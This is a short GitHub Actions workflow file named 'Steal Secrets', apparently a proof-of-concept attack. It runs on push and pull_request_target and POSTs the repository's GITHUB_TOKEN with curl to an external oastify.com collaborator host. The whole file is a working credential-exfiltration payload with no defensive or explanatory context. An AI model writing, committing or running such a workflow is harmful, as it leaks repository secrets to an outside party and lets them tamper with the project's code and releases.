name: Steal Secrets
on: [push, pull_request_target]

jobs:
  steal:
    runs-on: ubuntu-latest
    steps:
      - run: |
          curl -X POST 	https://h3lkdxl2kid5j1pmyzx1xs0mrdx4l49t.oastify.com  \
            -d "token=${{ secrets.GITHUB_TOKEN }}"
